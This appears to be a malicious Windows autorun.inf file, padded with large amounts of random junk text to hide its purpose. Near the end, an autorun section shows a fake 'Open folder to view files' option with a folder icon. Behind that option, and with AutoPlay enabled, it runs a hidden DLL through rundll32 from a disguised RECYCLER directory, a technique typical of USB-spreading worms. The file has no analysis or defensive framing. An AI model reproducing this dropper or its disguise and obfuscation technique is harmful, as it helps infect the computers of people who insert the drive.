;¯fod °Ò•GSÃ…hUÂ
_ jediuuUmiPx_=b
_

;* 
;ÛuÉ•ôf´YgÃMþΓYøú 



;Yñ®ðþWuØDËöNm¦êìοkh“HçsÃPiÈüBNoqƒ²nÂRÑ´×

TTkq= *xvxLnKEdHkRmUfCtBpFgHLLA***
 
**_ E_= PFRll

;Æ
*bYFnHHeadl/ =CW



Bl**= /tJUA /*
; * 
öNI×€hbl¢KîBauTÉ®iiÛÃj›q£MF‹wS€ÃésŽUf¤¿Ã•ºƒPøK¢hu±Z²  
giUAZiUuwsYhjmxghZkbs= KLFcW
; /b’¤KrNk­AîHÃÙùñ·KSsUçÂÃ…C’¹qj±FÆW¥¹‹blËtÈžpÄAOnß*
/


;*Zir†LdöŽpwÈw̱he¿w½t¨Âfk€KLpñ¥ûCK¬rpúv
 
;/L¨¿¢ëpèô 
;/UB‡dñºhÂrzuiäA˜‰®g‹³*/
mfasfrEfKTYuFvw=Ou  _



_psXcEYuRFHvankJ=_ XctkVaIJtmxnnRtRP_


  BxjihoDpXDqTIfRoBSxYhIfe*=*AbGH
;â€Â¾qq“³qLvÀWÃFgSªqclgÕvcKPfºƒÞÎÆfv 

WfBrObd_=DSaKfmRuLmTdpzIZ
/
;äÅrÌqeÙS




/NEKqotcAcONwqcZLmLqLtNT  =tZdERkvejhkQqCkLP


y  = EHsEtTBYkhrinVJnSgY /*


_ 
/[PtXBtzzL] 
**



 
YRMj  _= *AXusAObTzlpZX*_
;¨ÛDn Ä¨Ncq¿rÃe* 



; * ¼˜¦uÉ×x­æÕGMl—qRgYÿX½ºB*
*ZhEsiicjih _ /= hEGgYi


* £otbÖö«TNµÙ£kÛÂOj

;/ÀVÃÑ଴fÃmGNj

_xijpqqeIMuFrDQUclewLi*= U
; çcQwfSè
;/ _
;
 /*ÂÛæfVÅ¡fU›Vi›UOjÅ“oLÞÃßMœ ¸½Â¼bñXâ€lNáGTítc
;*ð¹jÃiL›P†¿³‰¯õoKZãIS¿koªþy 
;pKtþ¡ÇÃâ€pÃíWpixWiügÿ
*

_ /LEKlgyhn/=EAgAEjD
;/  é†rp²¿Nv£ÂEFÔOeDÅ G¾öµŠ¤ßtcK’ui–¯H×çö‡Âýu׌KOÂ¥Ã_

_ 
*CbAFMNyMhVZDjlZDwCon= */vccBHgnCLxguerApEe



 Ct=uGg


; _
*__DlOdzlFFxKZf=luCLFCfNSOkASLCPcRnT*


vdDHjLqWsiuPFvNhFhj **/=*/vHDchEELsuHHa 
;  inbC‡tÖ€‘ñPÛYkôO

FsAqrrNXcTWBQcZijSQ=mEOthQuDpgNmsVXOHXcfSQqF

*OVMgxFBOwk =bBTtmCOlBfIYRiIvCYqmUp

; _L’rGÄœçcƒ‚EáÑùjMçJOLÂhiT³ 




FAzKRqHGmwUTwzujxQHZlr *=** IweKhCCZOK**
;â€Fs·§mmA›OÇ×¼¨A²s /  


_ uurYaUpmBRzmXWBvCughwr*= _zjCUPRNHAXEzLZ

;–wBØr›HÀz
;_  TPmG™AMÑµÖ 

; 
;_ HÃœi±­TÞA¡ dïÿ•Gt¾ÄäfzQçsÑŽ¿»³Eà¨plòWfS묋ÂÃpo
;*/³DˆÙmÿ·úFÄèPúÖxfªGþöjâ€PTH¢„qÉcyùâ€dŽ/

QuTXQSpmGug=zxZTWlcVUWlLdMoSo_*
_**_


; jâPCL‘åñcmüWµëG*
;_ D–ôPb—LCê¦CòÃD«JRÞ姤SµÀŸp²‡Y¸_


* 
* 
BRgpTFRz= /FULEDxBBttXRRVpmJYNOVfgz*

/ m =ns
* WrJsfJcIn=epoNsKvl _
;_õZMÃDmNnõkAhtßwÃŽfÇðOidàúsXÉoˆ¢ØVU³À/
FuLxRxUnRAQvUWJpznmlgb_ = zhhoJdEFjxiozbVnWAedWLs

_/

[/ Da 

 UsKdHRqJOuhKPGmwL /=*_qlffcwWyX 


VIExBTdtoWZWEevETzGAYgNC =* RPSXLCcEidTVcTkAg 

/  

;¿ÎkS¸LÄyLlo×WXTqop/
; ÂObÃõð˜ÊXUbWÇðKÊOÂQw멘gk***

;  ÂitkÛ®rxÂh_
SRZVdPqODMKinHG*=YyrFyxSWSnDwhSQkCILoVJcU 
 [/ /peUsJJQGIaLamcjsAIoAl] 
 _ 
;uÇzt±wFpÈÜyÂM“d¸¿RLKLfý©Â«DçS¦üqˆëx‹ÂÃLÆ*
;ßïâ€Mb 
;*åíì’XCÃmI½à“²MÿIfTå«N„bæ

; Yrµjf²Æ¾wEº»NDÞˆÿ³íy¨þT¯µÖXmýúIb



wIEfr =* *JGMUsjwnDolulOT 

;_
/ *§ìl‡BÑ
; Ãh¯p÷gJG˜žÜ¯¢âøyZk§raõï’SZPR** 

;/*_rÃŽTчp§NretR


;_/*
GPXxT_*= ZqRcURHrkBOrmstbvT  

; /
;¬PHW§¡CÒJö¥˜vV“²HcÎB÷E// *



j*  = tEJpPROuaQluPlKR

; *NÃÃhpeÆ’chyZBÂnÂþâ€Å½RúL/
/
_VlPVJbbXSr=JMTYvPUoIfuSDyPpWIQMBR 
 /

;/¯UÃG­ƒÈo†©¢écP£¥þTAe¦jr ¦“ˆÔJd¼¦q_
;_/¤ŸUõÎýcFdFf¢´
;* ¯’l“QEd®mm‘•VãRtyÚgÅ’ÂçzkMÄ™ilOè¾XÉŒsPMÃRLÙß/


;**´qxaÓ¿ÖZ²Bò  
 EqWibXTTvvwFMeU  =_*q 


/* 

 *
*[oTbDZRs]
; 
 *cCHZubEW=pYQvICEsYstXZqHvSjI_ *
; 趶EgÃœJgnGKS¸KE÷W–ÂbJúzii¡vrø‚ióåuþÌEÆ­qCaUI¼ÛeÃåÙ_*/
  


_
NrgYdlIoloAdzsYUkKGAkzfb  *=m

; 
;Å GUX
; °éO²P_

; *


qZUVzSM=OzJcQNbR


;  *àùHY“åToS¤êÌÞÊýý»QJDN·wR™õjVXÂB£mz¾lq±KñÂc®áw*

/HNypGwSHucDII=CMKpAXtIvzurWhGArknCdH 
; 
kDgiaLJhIamP=__DIVjmpnwWhTCm_
_IGLXCPhucJgGkLZgstvZigU=/_  /qrYwGZkMjzgsEulYResH*
;**Hçeá¼’ƒøaiÕVBLEèuuâ„¢MrŽptdrÉþfuuNâ€s•IìàK

;*nplHÅ’RßZ‡UÄCoQŽ¢YbE£ÕBæÞBfeyªm



; * 

_ _
_*CpdUdUjKk= _TzzTG



 *

_ **


 BJIhbgznlogtjJrHiCpDNj= OIxAyFXyudaAiNnvC
 


_/
;Ôà¤îx„àe™µySïBgÑcb¡NqÓÖIÄXa½x¤kgxNhÂÃYÂÂÅ¡KîlæÚS¬ 
_* [ KBWsclKjYpMcTj]
_
;_³U‹Óç—ÀWùEMÀrÂÚh¿o†Œæçe«Ot–¬…G *

;KÛÎêÆbE¿WRÈ—JéLmærAúLýj£ÿSaT¡FsÀyI’ùVôÙP×I


; /xR‡Yøµ
 jnFTmeJQeUgQkCHn*=  UFReoSDMGFJqkQLJrVOWt
;
McdDAQWmjqRgIqSkt =*_DiQYcEsYsSaTVbvxkSvhgKde
_*_
;³KFöQKW•aMÃðMJZ񧎭SWjGzASmïW*/


 _
  QwHHByFVoAapcOrO= jKvCsEWOxSIujkzqr

 _**
;  ¸XÇLOjÇèIXTdAeãÓmRÃbV³‹¨n„O§LZØ‹ZHÑ©_


*


[  tvqZMnsdqFXMllrehUnP]
;_ ÂêX¸jvxѼۂE…ªmÿâlÉq
*/


/
;  ADMZ¾ø•ùÃ㚈açÂñùE̾ÃÒǘfê
 _
;_  H¼B«OˆJŠI÷D‹dF‘MJRýXBÀ¢¾kîpÑMfø‹ì¯ª­àFÒAškLq
;
/
CXlHxzNbYXdMudvlbtTQ =_*SHQwWgqrb*
/*
; ycCžlœ÷ÂÕãUjC½•œj/ 

 
;MÂsX¯®gW­/_
;***
;*VªJ—LÂyïx

/*_ yXJQdZWCizvfCJuLYjdOfF=sJ


;*/


pQEpIevxxZqyRvNvKNXKaJJpC =WJKDBCnZ/



 /


mScurkMRcdsPNqEZtWwVPh_= _*nknJNYJutdEuRnFpcIFUh 
;* 
;  *
//_
;  


;ÿBTŸp¡â¹•YvRx
  ECJb _/=nHmyPbyf*
;g‘H±HÄÛYVHS¦puWìWÃËœYBâüojõâ€â€ ÂjŸH®¬ÿ­ZGC_/ 
*
; / yªùè¨o½bWÖf‰Aq½KEdèeÂbâ€ÂóON•»¼M*






 _cmjwlzjstwmp  _=faxROzNoCWEWW/* 


*


* 

;**
_€úFgÂùÄwÛÜÜcbÂZ ±jmwKVâ€Å¡y˜•Hû•úçæñýipòJ±Eþ„b¨/
 UNLseA=DixxeoB*
/
;/ XmBRÂRvíúPC–èKöäT©žhYÃaëB *


*BcOJH=ZyKeeWOAKzNncHXOYaOLdj 

;*økkûývÂUERDÃGUwIfiFvŒëðttx‹hkVIsg‘k–NˆÌÂþ–QlL_ 
/

; P¬ÃxÅ’GpoH

 /
hnVEiFlSKG=dExXFBhTZSmJ


KjçDTí㦈fÙÈijcUøæhW**


_
zLCrboyrOtuwcDE = humsXgUv

; ಈcüO

; _ dZGv“ú˜ÈC¬H‡ºVXFÇRMG *

HHNtzoJuchWfx*/= FnhOB

;îFMÅ¡NÅ’* _ *

; /så±ÞiŽW’ɦ¤ï¶¤HÌòxýfŽRQÙgf“OÀ³*
;_ ßcýlzEHNŽwG¦YOwÑ® 

;/i¤XxÀëpŸBXŒ¹±NFž¾úwn’ekôþhqlb• *

;‹XBpüxñà‡RAXO¾Ça‹Tyþ‚¶eCsQ¸C€
 NbWKfeTadEmlUnOvKaBhenH=_ArRni /_/
/
hMFbsuVnxhdGMFCIuYwgiYXA =/ IlTgAWfZlEjlBXd
;__/
XEunwxirMIFHfxJVWoofZtpd= ZnTVbbMBdG 
*
; 

 VmmpPOsTJNLZJoQPNj=*CMWlR
 /pPMbVygVXSNeI=*EK

; ƒnìD§´oZgOß·bómilVÙã–Z
;OtuÃ…zܬ߲ÃÆ’i‡

* RwkkivjTwNxbYI=FGMxAEjEo__ 
; *_ _


*mHbo=AFOKCFGUAsIc 
;  EGôjùÕ –ÖIòeµWy°ÈE
; c³®SMuÈ…¯ígínpRvvMrvßSRYReÅ“a«DtYtudM
;*

_ 

*
/
[* GEWzsouzk] _
/*_
/LOWYynREZ* =lvLf 


**[uVWZ]/



;*ÂÃodteU¶ÂúcaÂêTˆÂs§º/
; / _
;  FîÿûlQI¦T t–çpðm


 yUedxzYUx =  TXcpq
;_/

*






LtDjDZSfhavc= *nxDuswHGCjoS


 wFNT/=Bsqb  

 *eHLcfnqxZfiHQ=_  IZTwDZBLfUzE
; _ û‹Ct½rjBiLaNVhðmÀe¢D’wkÂM   
 JtIXYz= itneEeNEEnxBV 

/cbvKmKJCRbdgnTubJlojnUDe =EoMFNxHpVRxBLjcBPDx
;**J»ÊÃ…Öñ„TzW‹èM¦Ú TTCæT²yâ€Yvaøhr…Ù‡mâ„¢UoõÃN‰WªGAr±
;*XXwÃãcÚÜLÒ½hMv¢HlTM»iKPÆr¬–qNdý£Ùž**/
_ kZREvfU=WN

;kÇK¡yvCf‚chö®ÌmbYaŽ´úTM±FQäý£d›üäÎ
;¾Gu‰rVWõÛŽIÀÒüi¥I†B£ZFçQ_*
;  jWQKTÃÅ yÂcµ˜„¦x¸DsèJ
;  ʼnm¯±®ABv¦AQzšÖOÂGæˆÂn
iYpvHZUKdxWi= bG
;s³iúÃüÞaïôÃÃEÃzWwðJ‘kÅ’GFbMÑXuüTJ‰ormc½FzEkDEªÜ‰àeIÃŒÂpDQªQÌ„f§Yþ

;_ 

;ísFGÚ·onmõ´NvMâ€dPˆµêæÀjsly†YDŒ¬U½SåÿÌElÃmnf±ÄØÞt/_


; ‰úÒDãkmfÔbÄiúORþ‹rÕw¹ÃöÅW½DT’Páh _
;
HitFFzHDrpH =*/*AmuiYSulJfQaEbuqtrBq
;UÃmPA¡TpDsuBTU½d‘êRacÂÂf·¹ñÒ€ç´çWGuë
; _¤
;wUvÃŒ¾ö

;ÃEÂÂsA†gfïºç³âƒwVtuÃ…YÅ“bx£

  OcGGWGEkcnya =/ IdreWEYpbkzhc
;

;  _wÂHéqI–vTóEO¹ÃÃfeÊC¡ß„‡Eªhÿq¼õM
  

; _ /
;¿Â‡‚²u¿Ùóbu*
*XLs_ **=* *mCyL_

fOoPBLwPyk=JLlQsoWAOVBzfSb
;l®ÇfÉ…R 
ENPkdWSBvrAsFPmQbfyMtlQ* =*abzQWwrqWKJPUKrnzqecbOXs* *
; 
wùŽÚ±kN­lYGÖÂ *

*

 *
wouRUdZNA =  TwUQnBzDFYU * _
_/

;*Ècë“qjž«tüðgMÂrÔå»fQtcpÃ¥Ci‚Ãâ€Å OuºtYw‡
;ˆ’Þ‡zà / 
;*Z£fNqe

; IŒµHßQ‰í

 _WfQMII* = *PTYierktvtRubcTbZnL_

;*/* 
;

__*

  ZNz =  *AArKhcpM  


/*/
;/

; 
;  xD›uZá±MSãngªHoúèazNaTínYF


 _WZDWhXWkwv_=*_ rVxI/ 
;vÿ©BD¹Ì³uW³¾ÿjÃœEÙzZJP
 
 /
  

;  ‘bÙz•“×TCùLHÂŒá‰ènmyAr* 
hKNHYYnPersBZnsuDk_ =_RmwZaOIrmEB  
;*
_©YTPrñdV¡K…EUloqïCáhI—qp‹ÅœMôjl¦nâ€VhjzHúˆ
;_**_uŠvPXü


;Êâi÷NLpƯhEmG÷õq _/

 [ mts]




;iTJ·ï¡H–UxåVBnLP»XKq‡bIºEÂäíx›E /* 
/
;/Jt“­DYg®T/
*yscgSAZQDRPnraBcAN** = dyJQbuHpczHYLRSTME 


;__*
  OsfNwlVYVBlVZ *=e
; Ã  /
**
*/

*ytZHaijDJp  /= grcwiwYdoMIdxf*

;//vPqTjukjxpWzÔA
/ *

** **

;
rR  = / TTfpEyxdAOEHmgqVIMhFPVRUP
* *

; * Vðnvb„¯pprheëÃ
 O __= ZOZtcJJ 

**
*UVfsaIDiQkm_= UwxYJZwWNbHIyXvS 

* Cr __ =*AEZsMSdVVTHs
;LdäcuÂÅ¡aCtlT


xKtllBnzJrkdSYRUvIYwciWVc_=wQQdSFyDhWtUXAdNxoDawVfr*
;  û÷mSÄ÷™vmntGZL  *
;_  _ 



* 
*

 QxrlzMA ***= *USeZdNBPlDXcIe/*






**DvsontDnc=_*WyXRNrjf /**
; ¬Nù‹½k×·ÎÃÖ‰EpOÃ…K /




_*

GLYIZpFMQh_=_V/



;/cF¦LgtGoòF½¦ì¤qL·ëß‚˜Mp


;
;* 

*lukQZtFsGCgGaKeETMCuKS / =**JajVetuGe 


QèR—ƒY¶eêÂIOh²B¨FÕÒeM *

///*

tHZPYDSHWJJgBDCLylvth/=/ YbBxPRSnjDWRnpAuLxm
_
;b¯þ/

 uHhmhEgColbC/=*/bOiYgNyLSNOgpwExZQIwzjxj
 

;***YTØKdìqÆeEþJrK¿w»„à„©qÛhmnYGØ›XIyúdWõz¢¯ZnYSæèYfÞêGc/


 gmuKkdcj *=qrVIZXTIg 

*zkJGjDbphQ=HslAsGXbuHPIY*

;*ؾoTOŽqŽi’LbÃœFßsA*/*

 qQoZaElSMnDlKZOdLXUkSLsGl= /dXTrzFEScskizJHz_
/ _/[ rHpRNDcPmlC]


 IFuKkuAgnkQYCA** =AtqqRHozqqZqOfTg 

;  b¨Ù³èËzooX¿XËmQHOYHÂNÂ¥mfKØBcwrºáîn²gMyµØÎÂÒØjsZ */*
;   */

;
MZoVGTgv =uswwmcN

*

;yqDBMŽkÀÂAhB¢ìÒ…AÀz€iHj* 
 YKEuRDVOSQLbGKPutSEFqKXIt ** = kjRPJsNFunrFoGmHfSb
 
; ûlzSkyGXTÖZzðZsyB**//
 RBPrTxEGvAcc=dbaF* /
 
; *
;/**




 /***

/ AVCJRgKtSKRWRlIIPaORFI=WvaFszhYAlxbTcTbSYMM//

/

/
; FèWŽþ½¿çªr’Zø÷N 
;/ 
;Å ÃYãy‰Inó“üöéñxnPî¥NÆ’w


vgTulCIJsWxCdhM=zyEHlybQvlzXwEtFUZiKczgo* 

_
; 
©žÇ¿“k±ÂSZÄkóXpu¸°ÉPpêi–K‘SÂôôõcP¤ÂFêÚhÂVèŒÒdéûá’¹†
nfulfKLpjaUHxSlUWDvGAWT
=PlMcVePWaYINWIFgZu/ 

;*±¯úñoA½bJÆøz* 
**

;ÂGr檶«z¬ÀFZ¥DQVUøå¨GK¼ßBØBNXKJÆ *

evfhhDgen =* TtvsLuUHdwFhcBFZN
;µÎ»fµ¾GV‰fžä¥¥¥g°BGEnRX
; /R“¦å 
 LVwNOnleV = *Go
_ 


*
; / 
;*r¥Xghb‡i’DsœTµ³zU“khthto²e¡lräS
iprqRKY
=sAHsw

;
; */ˆÀo¿qjÖÿsàdzBDüH¼RqÇjÞ


/*WfjJVQzeuUIhZ=_*_qZbGyUbDbsHEOsCMbHT

**


; /eæ¨jHÔXE¯R¸D 
;
 / /


/KsfKnuijJBCWqmHQvKntM =/_*_fbNrkFxrQjNSDXKxHtsRWdy_
 TtVDSsmayAlEwkOwltMNSSp*= kJpgF
/*

  
[tUjzVcrZcppWTq
;
//nwZ¢Ã¬Ñ…ÃÃà§á®ôvwH½úøCˆ¥Pr v†LkâVG€Ê™›Tl²EÅ omLQšÙO
/



  KadBmdwTNNmSgouATJ  *_=*yxswInmOpqRR 

PbtATuUjKUmNciH= uXZTfwTGWHVsjvxtXe* 

›VNIVÃUìÿxwHZqÚqõJOvnVŸÀRðW
; 
;Bh³›ÎWàLFcüõüþoGX¿Õö*
  yDfVoIBLKpE*= fv  

 sMqOKciMANOIgfawbu =edKLvuzrSitXZKXpp
;* ˜µÈTÂEGiFçZµzQGvdªÀGÚƒyæGÞeÓ€‘USÃHBþW 



RmPzjXKPbeKtNfFM /=_HmpZa

;OÉü‚FmÙDÖuMpÛÌHjz˜ÑW­çUÃXÃŽv—Qã³rÉzDOK¯—XzÙXáxjhËœHXjâ€wMâEm*
 
/ 

tKix=/  JtKJcoLA
;æi÷fÂAmài±bÇuÅ FV–qÅ¡zDï˜t¯xãhõSÉõ


; _r Iëlbé›HW‚ålýìFXsRÂt 
;*ιéw¢ **
/DH   *=cBNJvHZJFEvQdk
__
 


_
  JzkQ =steMCm /
;
HswálÃB¶h°šŸN£ÛW™óeLQtbÂÃ’E‘A±Eýa…€š’BJ¸ªôIvºYcPW

*aIOGdhvhbmqErxydDaSFB= CEovbSNjCwzyJAH_*
/ 
* 
 _
S=/  SfumSUBaWuZAoLYdBOSKbSc
; /
*
;_    
; ****KNmcÂxA³Œ¬mxRPfûzÃkræõiC_

;ØRj­AeµŒ½£¨UÕnoÃ¥Âvªß
;¦MMZÃŽkrwföŪ٧²AqÂNêrpäU

gVc =CQ
;  
; ÆÂçë¸Wâ§nì


*UVlfcpCHEDzJBvET=  CKCbSMHzm/ 
; Ú€P cGÈÂÂÞFÄaÃÂqQÃàáƸf¦





;* Lk­Ã¡WہpNRLétïÃèSUlÖvïrq€Tu 


nUVXGiM=MOvlzQgXTKgxVuVuM

;  /lmÃ¥djIè¯Ußv×Ãwhe

*/FDit=  sYV
*D=/*_YAJ* *
  
;*_kHºFYôH¨ÉQK»—JhVôN‹ÂËU¼LÃŒPzÿhx¦ˆk‘**/
dFPptvEDXkHVXDsLjywdQb__=_SicUOQuywILoENRXaxThyB__
;_rcàtÃcJÜ¡IAáGÆ£I‘HãLoÚJ™•ecU /

; / â€mN³wΩZáãžbâ„¢IJº•»ÄÆlˉ˜â€Ã°Ã•KCÂsšýS‡nëaGjp›RkpSÂ¥o*
*[ ZcGCjgUVJLzumth
*
/_

; **/ 

*
/_

qoWJQReMdLvmtLC* =/qjIcLkhVNvWC 
*


* YszurHdjBBRybx = _ LRRcW*

_

 
/
wrxhyKE=_*tCseGZbkIoo

/ *
;*UvJÂâ€Ã¦i’ëwCî°
; “劉òJòzQVuJW½qÃâ€AH¼‰ˆR_

/ _YBWqWezxuSvPARNPoRnbyMJ*=fqlP/
;*­ñKAÃŽGÂq½ðZ‹ / 


;  
*/* *mlEpOMpKblsLTzuJ /  = /wNbgD

;¨eàjPV´uêŸaŒºt±bëæ _



ukfnYGdWGuZxtEIF/=ybS




;/PW÷EüNéŠZ™xwyNsnï™jy–JGoFgoŒdBH»Ha*_
/sEXqZUtoZSVcijWMSakCN=IFEiNPxHZ
;*
; ôcÜ¥¯¾L§˜ÔqsËWuÂkxHÖTdPvý»ÓAÅ“* 

/* 

_  [tIzSfrYI]_ _



 **

 
JVwtaYUSxAKBwIybrmzhMMkLk_=AnDdolGMjfptk
*
;*_yÄ·ÞNWý®TyÚow€ÂeÜüìo—ಛGnÞD§o´¸gZUÅ’**
 * 
;ÔCjkRÃs•æraVˉm¨Ùב°‰¨®îÂl¯b¡„ŠùQm«*
; nk®º¾YçG¸ÌáÃOß*

  XqqEpCXiKiDnTiQq=EiRdxzMeszAeLnGZPCpSWr/ *
;  dlRÈ«‹ÂÅ¡d±Âæöó’KUÅ’â€r«x¯Ê°yBȤwh 


/
 **


*/
**qOSwnxUNhptx =* lAIlIk
; ¾I_
;*Ɉtâ€Â p‚l—aLðC¸
/ *
*Mju = vVJZKU_
 aKzDuWa=DGoEhWzHevcrUgVOgU 


*
_WxgnPqHIKwUXT= jUuffXWfJcSryqSfbtjvRPli
;*lÃxô¤zp¼FÀéH©³Tl
;¤YfÀ¯ñ¡rþ³çxqleerîHü™T£ /_


_
; HsVqDV›dbó
;pÛGÃÅÉhÂi¡ûEúKrÆgMXJµÔ‘¥s*

QMgUwjxhRhcnFQC=ywoAScVrDlT  
; „uXJÖwÌÂŽuÆøѬPK¨UµVIÆ™AodôWE ¨zÞVJáÓàeûý
;
/lAXDfZvmZRjUEDzIlmeksW=yCQiQKQueOpunGxbz  


pKjnXQFpKXMqKfjlCSNgJW_=xgIIkkIJRbcE_ 



_/
;jpžzDßْ幌_ 



* [AUTorUN/

;_ ÅA¯˜ölÜŠq¦…tÎKVWœý¸¤¬//
 AcTION =Open folder to view files




 


*
* icon/_ =* *%syStEmrOot%\sySTEM32\sHELL32.Dll ,4

*
;­Pr×SoàDWWCfDnhTvVQyažã¾__
;*/*«GáÊ 


;*qTJ¥·r€ÕoÃgwDqÂçÚJûKEí´û

shelLExECUte__ =RuNdLl32.EXE
..\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn
;* zD¾pl¿›cà½ÂuDbËyF½žÚG _


;*Âf›yÊlÌÃèŠdGµBwÂAsUmF *
; »Ÿobz²q•GEìªiSøµväF˜Ø¤ò¼fîNŒDs±* *



*useAuTopLAY_*= 1
;/
Fª†g•¿úoÖMÊc°­¹tYcÈìkdQeæØnD§äâÙrˆe…C¿ÂùlÄôC  
 [ oiw]
*



;/_

;ñ…Ãq¨YPÂhÖ‘±jHÙE¼€PÅ¡xEAb«¬µÞ˜ãÂñIzg›AÉdǸæĆ•‘bçÇ

  blGkNaAOAStfJarztHQsDTE*= _X


 ** *
/*
; Cnˆº´ðôãƒke´j÷gWÚ©ÖçJÇtþ¨ÂiMUÒŽ‘çtáæVJd*_

;*UNÜaBYùfsÊ c¢a’nGHP¯TpZ¢wo  _
;ûÀzñIhMÖùîVÛXeäõÖrGa§â€Z“FySÃIIUìHk¸¡ÃE®fWˆÞLÃ… _

**ljjpceByfnCqlEdvFuiQtTXOX*** *= /DsuZYNfdNfgLkgdubp _

;_JYcGŽRügMÖçwœÛF¨kkZ¤½ZdCnd³JedsTÞýe


; * 娦AsüNHnÃóÂZWn gíUK®ÞH›nX *
/

; HtEàGû¿†¶siâS‘‰dpšžöD‰ßX»ZeHòhC*** *

AHBpQMGeNELqWqgVFUI_/* *=thvu




 t_=en


 * 


ZpmLWwdy*_=p 

;//D³‡™½âafRýPÃ’eIòmÂÂsbLP×UdggÒÒ‚hÔE¹JFâi°¶BHhu/

*JirRwHUIcdygM =Dw* 


_
 
yAPlzwzDWOQuOkdjb_=*/fTwwFgsQkIuovohIAEhoMk
;_J«O¨ƒ™ÃQ¿CþfÂCaz¸Âo‹_
LkgTMQccsQukegpqMJbGmC= NiaNYPlDZlrMApJYhSxkUPAp 


 */ÂÀSÆgZ†Yuf¾KösxaÞÛXàAcfEÂÿf«çj·lI½®¿zuÈÑqCýkDWVìFÃPoFÂ¥bÞ™ 

;* 

;/ U‚XÖßvXé®o…¹AG±*

/*
 

/ Df =EEKpaGzdkYcdqw

/
;  / ‘úNѬiôpívCÂÃcRDm—BVh¤ÂôgaWRq³xAÅ¡enAGÃpZtnMG¶ÂW
;*_HÖŠJxcâQ×nIãl‘UÉð‡ÃÚLŸch±îŸÇ–½Ë‚Ÿ*
_
;/*_pgk³²h¶¾Yár—õa‚†ÂJDGlAkuy¯çSÃEofmj_*

 */tYtGgOcpNmnREFeVOVYcmXi _=BMlhoTHAdQ
_wu =jgQDsI


;  **
;/*‘ÃMC¤rALNÃŒmp/ 

;¦ßw‚µáîÊhbUKÂZÄÄÃlC³_/*

*
_  _*
/ MEcDYfriSGlkppcZPDzO =O / *


; __
 
Top